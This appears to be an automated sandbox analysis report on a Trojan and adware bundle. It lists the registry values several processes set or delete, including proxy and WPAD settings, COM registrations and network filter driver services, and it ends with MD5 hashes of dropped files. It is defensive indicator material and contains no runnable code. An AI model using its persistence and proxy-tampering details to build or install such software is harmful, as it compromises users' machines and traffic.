[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 48 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process amisetup2899__9664.exe:3368 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1430290658"

[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"

[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "33 5F AA 66 9A 83 D0 01"

[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
"(Default)" = "1.0"

[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
"(Default)" = "InstallerLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"

[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
"(Default)" = "Inst Class"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]
"(Default)" = "scalawag.wuther.1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup2899__9664.exe"

[HKCR\scalawag.wuther\CurVer]
"(Default)" = "scalawag.wuther.1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"

[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
"(Default)" = "{1cee7e9e-b36c-4404-8341-eacc6687da52}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 49 00 00 00 09 00 00 00 00 00 00 00"

[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"

[HKCR\scalawag.wuther.1\CLSID]
"(Default)" = "{c8c02f46-c416-4092-a52c-abb5232cb4b9}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

[HKCR\scalawag.wuther]
"(Default)" = "Inst Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"

[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"

[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
"(Default)" = "scalawag.wuther"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"

[HKCR\scalawag.wuther.1]
"(Default)" = "Inst Class"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
[HKCR\scalawag.wuther\CurVer]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
[HKCR\scalawag.wuther.1\CLSID]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Programmable]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\scalawag.wuther.1]
[HKCR\scalawag.wuther]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]

The Trojan deletes the following value(s) in system registry:

[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process GOSafer.exe:3284 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKLM\System\CurrentControlSet\Services\gosaferdrv]
"Tag" = "17"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "21 B7 48 6B 9A 83 D0 01"

[HKLM\SOFTWARE\GOSafer]
"instid" = "OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "10 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process WNet.exe:3080 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\ssfilterdrv]
"Tag" = "13"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"

[HKLM\SOFTWARE\WNet]
"instid" = "XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0C 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

The process 310714_is.exe:948 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer]
"GlobalAssocChangedCounter" = "35"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
cd594b7e64bbb60804076c1434a1ec09c:\Program Files (x86)\ActSys\ActSys.exe
d6f19bc6d4f54dfae1a4d4b96d12f1c1c:\Program Files (x86)\ActSys\ProtocolFilters.dll
bec584303ce252396a3731ce5bdcf03ac:\Program Files (x86)\ActSys\libeay32.dll
d8305b5c2810e2e135f87bb32d62810ec:\Program Files (x86)\ActSys\nfapi.dll
01b5780505301ada6dc102fb77b2298cc:\Program Files (x86)\ActSys\nfregdrv.exe
f40cddc932f47b3e406d0c4fde03dfd8c:\Program Files (x86)\ActSys\remove_ActSys.exe
da6f5524c9e5b5804dc5117022d08331c:\Program Files (x86)\ActSys\ssleay32.dll
84887ac0f5fde399c83b3bc5a7aaf097c:\Program Files (x86)\CashReminder\CashReminder.exe
d68a76ab1ebbbdde37bb12bd68b1639dc:\Program Files (x86)\CashReminder\ProtocolFilters.dll
bec584303ce252396a3731ce5bdcf03ac:\Program Files (x86)\CashReminder\libeay32.dll
d8305b5c2810e2e135f87bb32d62810ec:\Program Files (x86)\CashReminder\nfapi.dll
01b5780505301ada6dc102fb77b2298cc:\Program Files (x86)\CashReminder\nfregdrv.exe
da6f5524c9e5b5804dc5117022d08331c:\Program Files (x86)\CashReminder\ssleay32.dll
f2f4090a44f85db92f9ec40483c7e502c:\Program Files (x86)\CashReminder\uninstall.exe
45c9d00b83bcafd991f95eeac6097b7fc:\Program Files (x86)\DesProtetor\DesProtetor.exe
9a0c59099f8589ee0f026bcd42c06800c:\Program Files (x86)\DesProtetor\ProtocolFilters.dll
3e1176c39139baf084e9a69d6d50438ac:\Program Files (x86)\DesProtetor\libeay32.dll
0e2ca4f2d3f113f006d5801319a626dec:\Program Files (x86)\DesProtetor\nfapi.dll
92a6df47283b49b207045fa7a4502bc1c:\Program Files (x86)\DesProtetor\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ffc:\Program Files (x86)\DesProtetor\ssleay32.dll
28ca54fa79bb30e8eef8ebd5053ee746c:\Program Files (x86)\DesProtetor\uninst.exe
9a0c59099f8589ee0f026bcd42c06800c:\Program Files (x86)\GOSafer\ProtocolFilters.dll
c1908176b417b29dcfcfc15d7de9de63c:\Program Files (x86)\GOSafer\gosafer.exe
3e1176c39139baf084e9a69d6d50438ac:\Program Files (x86)\GOSafer\libeay32.dll
0e2ca4f2d3f113f006d5801319a626dec:\Program Files (x86)\GOSafer\nfapi.dll
92a6df47283b49b207045fa7a4502bc1c:\Program Files (x86)\GOSafer\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ffc:\Program Files (x86)\GOSafer\ssleay32.dll
9d37509b72dc3143feffc3f1977c9d7dc:\Program Files (x86)\GOSafer\uninst.exe
9a0c59099f8589ee0f026bcd42c06800c:\Program Files (x86)\WNet\ProtocolFilters.dll
45571677457a9bfd49aadada0fd91ca8c:\Program Files (x86)\WNet\WNet.exe
3e1176c39139baf084e9a69d6d50438ac:\Program Files (x86)\WNet\libeay32.dll
8249371485714e1f45a4b1c67002cf47c:\Program Files (x86)\WNet\nfapi.dll
92a6df47283b49b207045fa7a4502bc1c:\Program Files (x86)\WNet\nfregdrv.exe
4fbf0e0dd471ce2945c33c14e14269ffc:\Program Files (x86)\WNet\ssleay32.dll
6200d767a099a1744e99abae47958a42c:\Program Files (x86)\WNet\uninst.exe
0183c88583bbf1c99d67acce017c9bebc:\Program Files (x86)\XTab\BrowerWatchCH.dll
fd0b82d24d162e240931cfd5540d3021c:\Program Files (x86)\XTab\BrowerWatchFF.dll
5785680870eff9ba7b4f58c726552013c:\Program Files (x86)\XTab\BrowserAction.dll
b124f96efd0010e4f7e262f08519e9e4c:\Program Files (x86)\XTab\CmdShell.exe
77ccf1c943665ececf9a5ce699560500c:\Program Files (x86)\XTab\HPNotify.exe
4a345a11cc64ab72cb09ff391611dad0c:\Program Files (x86)\XTab\IeWatchDog.dll
cc709fa63d5a536a2f8275c0cea39070c:\Program Files (x86)\XTab\ProtectService.exe
efa257c845943b84922117758c955434c:\Program Files (x86)\XTab\SupTab.dll
3e29914113ec4b968ba5eb1f6d194a0ac:\Program Files (x86)\XTab\msvcp110.dll
4ba25d2cbe1587a841dcfb8c8c4a6ea6c:\Program Files (x86)\XTab\msvcr110.dll
e29708f3781e5790424ca59a0fbb1bd3c:\Program Files (x86)\XTab\uninstall.exe
8a8f5ebe2fd9c2e6325723209b9cdf32c:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
8a8f5ebe2fd9c2e6325723209b9cdf32c:\Users\All Users\WindowsMangerProtect\ProtectWindowsManager.exe
d61776c4928db339475ab6a773585c9dc:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_am2[1].exe
c5e3b60827475c15298f27df5aa241dbc:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\046C1ZNT\310714_cr[1]
